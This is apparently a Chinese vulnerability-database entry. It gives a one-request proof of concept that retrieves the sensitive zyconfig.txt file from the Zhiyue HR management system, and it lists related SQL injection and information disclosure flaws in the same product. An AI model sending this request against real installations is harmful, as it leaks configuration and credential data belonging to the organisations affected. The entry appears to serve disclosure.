智跃人力资源管理系统 zyconfig.txt 存在敏感信息泄露漏洞

漏洞描述

PoC代码

GET /resource/servs/file/zyconfig.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

相关漏洞推荐

• 智跃人力资源管理系统 zyconfig.txt 信息泄露漏洞
• POC zhiyuehr-generate-entityfromtable-sqli: 智跃人力资源管理系统存在SQL注入漏洞
• 智跃人力资源管理系统 SQL注入漏洞
• 智跃人力资源管理系统存在信息泄露漏洞
• 智跃人力资源管理系统get_feature_permission_android.ashx SQL注入漏洞
• 智跃人力资源管理系统get_employee_for_part.ashx SQL注入漏洞
• 智跃人力资源管理系统employeeBasePay_info.ashx SQL注入漏洞
• 智跃人力资源管理系统GenerateEntityFromTable.aspx-SQL注入漏洞
• 智跃人力资源管理系统数据库配置信息泄露